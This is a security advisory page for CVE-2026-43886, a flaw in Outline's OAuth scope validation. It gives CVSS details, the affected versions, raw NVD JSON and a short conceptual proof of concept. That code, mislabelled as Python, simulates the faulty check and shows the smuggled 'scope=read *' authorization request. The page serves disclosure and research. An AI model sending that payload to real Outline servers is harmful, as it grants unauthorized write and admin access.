Security Vulnerability Report
中文
CVE-2026-43886 CVSS 8.2 HIGH

CVE-2026-43886

Published: 2026-05-11 22:22:13
Last Modified: 2026-05-11 22:22:13
Source: [email protected]

Description

Outline is a service that allows for collaborative documentation. From 0.84.0 to 1.6.1, a logic error in OAuthInterface.validateScope() uses Array.some() to validate requested OAuth scopes, causing the function to accept the entire scope array if any single scope is valid. An attacker can smuggle the wildcard * scope by requesting scope=read *, escalating a read-only OAuth token to full unrestricted API access including write, delete, and admin operations. This vulnerability is fixed in 1.7.0.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Outline 0.84.0
Outline 0.84.1
Outline 0.85.0
Outline 0.86.0
Outline 0.87.0
Outline 0.88.0
Outline 0.89.0
Outline 0.90.0
Outline 0.91.0
Outline 0.92.0
Outline 0.93.0
Outline 0.94.0
Outline 0.95.0
Outline 0.96.0
Outline 0.97.0
Outline 0.98.0
Outline 0.99.0
Outline 1.0.0
Outline 1.1.0
Outline 1.2.0
Outline 1.3.0
Outline 1.4.0
Outline 1.5.0
Outline 1.6.0
Outline 1.6.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// Conceptual Proof of Concept for CVE-2026-43886 // This script demonstrates the logic flaw in OAuthInterface.validateScope() // 1. Simulate the vulnerable validation logic const vulnerableValidateScope = (requestedScopes, allowedScopes) => { // BUG: The use of .some() allows the entire array to pass if ONE element is valid return requestedScopes.some(scope => allowedScopes.includes(scope)); }; // 2. Configuration const allowedScopes = ['read']; // Assume user only authorized 'read' // 3. Attack Vector: Smuggling the wildcard '*' by pairing it with a valid scope const maliciousPayload = ['read', '*']; // 4. Execution const isAuthorized = vulnerableValidateScope(maliciousPayload, allowedScopes); if (isAuthorized) { console.log("[+] Vulnerability Triggered!"); console.log("[+] Server accepted the payload:", maliciousPayload); console.log("[+] Attacker now has full access via the '*' scope."); // Real-world exploitation would involve sending a request like: // GET /oauth/authorize?client_id=...&response_type=code&scope=read%20*&redirect_uri=... } else { console.log("[-] Request rejected."); }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43886", "sourceIdentifier": "[email protected]", "published": "2026-05-11T22:22:13.350", "lastModified": "2026-05-11T22:22:13.350", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Outline is a service that allows for collaborative documentation. From 0.84.0 to 1.6.1, a logic error in OAuthInterface.validateScope() uses Array.some() to validate requested OAuth scopes, causing the function to accept the entire scope array if any single scope is valid. An attacker can smuggle the wildcard * scope by requesting scope=read *, escalating a read-only OAuth token to full unrestricted API access including write, delete, and admin operations. This vulnerability is fixed in 1.7.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://github.com/outline/outline/security/advisories/GHSA-7732-6qrg-wjf4", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.